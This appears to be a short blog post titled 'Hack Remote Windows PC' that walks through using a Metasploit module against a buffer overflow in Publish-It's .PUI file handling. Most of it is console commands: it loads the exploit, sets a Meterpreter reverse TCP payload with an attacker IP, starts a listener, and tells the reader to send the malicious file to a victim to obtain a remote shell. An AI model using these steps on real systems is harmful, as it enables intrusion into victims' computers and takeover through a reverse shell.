Hack Remote Windows PC using Publish-It PUI Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Publish-It to open a malicious .PUI file.

Exploit Targets
Publish-It

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/publishit_pui
msf exploit (publishit_pui)>set payload windows/meterpreter/reverse_tcp
msf exploit (publishit_pui)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (publishit_pui)>exploit  


After we successfully generate the malicious pui File, it will stored on your local computer
/root/.msf4/local/msf.pui


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.5
exploit

Now send your msf.pui files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer


0 comments:

Post a Comment